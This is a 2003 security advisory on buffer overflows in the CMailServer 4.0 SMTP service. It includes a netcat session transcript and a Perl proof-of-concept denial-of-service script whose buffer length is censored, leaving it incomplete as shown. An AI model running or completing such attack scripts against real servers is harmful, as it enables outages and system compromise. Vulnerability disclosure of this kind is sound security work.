Multiple Buffer Overflow Vulnerabilities Found in CMailServer 4.0 http://www.youngzsoft.com Discovered by Dennis Rand ------------------------------------------------------------------------ -----[SUMMARY CMailServer, a small and easy to administer email server software and web mail server software, can help you build your own email server for Win NT/2000/XP. It enables you to send and receive email across the Internet or within your LAN. The ESMTP authentication, ASP form web mail and multiple domain names are supported. CMailServer offers an unlimited email users license at a reasonable and affordable price compared to other email server software. For those small to medium sized companies, CMailServer will be an economic and effective solution to handle their e-mail management requirements. CMailServer also is a web mail server software and provides full web mail service. The web mail is based on ASP. You can customize your web mail interface freely. Give it a try and find out how easy it is to build an email server and web mail server for your own business. The problem is a Buffer Overflow in the SMTP protocol, within the ESMTP CMailServer 4.0.2002.11.24 SMTP Service, causing the service to shutdown. It is possible to actually overwrite the exception handler on the stack allowing A system compromise with code execution running as SYSTEM. -----[AFFECTED SYSTEMS Vulnerable systems: * ESMTP CMailServer 4.0.2003.03.27 SMTP Service Immune systems: * ESMTP CMailServer 4.0.2003.03.30 SMTP Service -----[SEVERITY High - An attacker is able to cause a DoS attack on the SMTP protocol. And we can actually overwrite the exception handler on the stack Allowing a system compromise with code execution running as SYSTEM. -----[DESCRIPTION OF WHAT THE VULNERABILITY IS The Vulnerability is a Buffer Overflow in the ESMTP CMailServer 4.0.2002.11.24 SMTP Service When a malicious attacker sends a large amount into the "MAIL FROM" and the "RCPT TO" The buffer will overflow. If the code was carefully crafted, attackers could execute Arbitrary command in system privilege. The following transcript demonstrates a sample exploitation of the Vulnerabilities: ----------------------------- [Transcript] ----------------------------- nc warlab.dk 25 220 ESMTP CMailServer 4.0.2003.03.27 SMTP Service Ready HELO Foobar 250 win2k-serv Mail From : The same Vulnerability is in the RCPT TO nc warlab.dk 25 220 ESMTP CMailServer 4.0.2003.03.27 SMTP Service Ready HELO Foobar 250 win2k-serv Mail From : admin@somewhere.dk 250 Sender Ok Rcpt To: ----------------------------- [Transcript] ----------------------------- ----------------------------- [Exploit Code] ----------------------------- #!/usr/bin/perl -w ################## # ESMTP CMailServer 4.0.2003.03.27 SMTP Service DoS attack # # USAGE: sploit.pl # # Summary: # # The problem is a Buffer Overflow in the SMTP protocol, within the # ESMTP CMailServer, causing the service to shutdown # It is then where we can actually overwrite the exception handler on the stack allowing # A system compromise with code execution running as SYSTEM. # # # Ive censored some of the source code out. =) # # Solution: # None at this time # # use IO::Socket; $target = shift() || "somewhere.dk"; my $port = 25; my $Buffer = "A" x ; # my $sock = IO::Socket::INET->new ( PeerAddr => $target, PeerPort => $port, Proto => 'tcp' ) || die "could not connect: $!"; my $banner = <$sock>; if ($banner !~ /^2.*/) { print STDERR "Error: invalid server response '$banner'.\n"; exit(1); } print $sock "HELO $target\r\n"; $resp = <$sock>; print $sock "MAIL FROM: $Buffer\@$target.dk\r\n"; $resp = <$sock>; print $sock "\r\n"; print $sock "\r\n\r\n\r\n\r\n\r\n\r\n"; close($sock); ----------------------------- [Exploit Code] ----------------------------- -----[DETECTION ESMTP CMailServer 4.0.2003.03.27 SMTP Service is vulnerable to the above-described attacks. Earlier versions may be susceptible as well. To determine if a specific implementation is vulnerable, experiment by following the above transcript. -----[WORK AROUNDS Upgrade as soon as possible to version -> ESMTP CMailServer 4.0.2003.03.30 SMTP Service or later. The other workaround is to disable the SMTP service but that is not fun. -----[VENDOR RESPONSE Quoting YoungZSoft : I thank you very very much for your report. We will fix this as soon as possible Yaoer -----[DISCLOSURE TIMELINE 24/04/2003 Found the Vulnerability, and made an analysis. 29/04/2003 Contacted Vendor at support@youngzsoft.net 30/04/2003 Received response from vendor with a fix to test 01/05/2003 New version tested negative for the vulnerabilities 10/05/2003 Public Disclosure. -----[ADDITIONAL INFORMATION The vulnerability was discovered and reported by Dennis Rand -----[DISCLAIMER The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.